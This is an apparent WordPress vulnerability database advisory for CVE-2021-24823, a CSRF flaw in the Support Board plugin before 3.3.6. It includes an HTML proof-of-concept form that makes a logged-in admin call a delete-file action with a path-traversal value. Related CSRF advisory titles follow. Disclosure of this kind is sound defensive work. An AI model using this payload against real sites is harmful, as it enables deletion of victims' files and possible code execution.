Support Board < 3.3.6 – Arbitrary File Deletion via CSRF | CVE 2021-24823 | Plugin Vulnerabilities

Description

The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-content/plugins/supportboard/supportboard/include/ajax.php" method="POST">
      <input type="hidden" name="function" value="delete-file" />
      <input type="hidden" name="path" value="/../yolo.php" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 3.3.6

References

CVE

URL

https://noob3xploiter.medium.com/support-board-3-3-4-arbitrary-file-deletion-to-remote-code-execution-da4c45b45c83

YouTube Video

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

1bdebd9e-a7f2-4f55-b5b0-185eb619ebaf

Timeline

Publicly Published

2021-10-18 (about 4 years ago)

Added

2022-01-26 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-01-27

Title

Internal Link Builder <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-02-08

Title

NextGen Gallery < 3.5.0 - CSRF allows File Upload

Published

2019-01-16

Title

Polylang <= 2.5 - CSRF in categories and media duplication

Published

2023-11-09

Title

Woo Custom and Sequential Order Number <= 2.6.0 - Cross-Site Request Forgery

Published

2014-12-18

Title

Twimp WP <= 0.1 - Multiple CSRF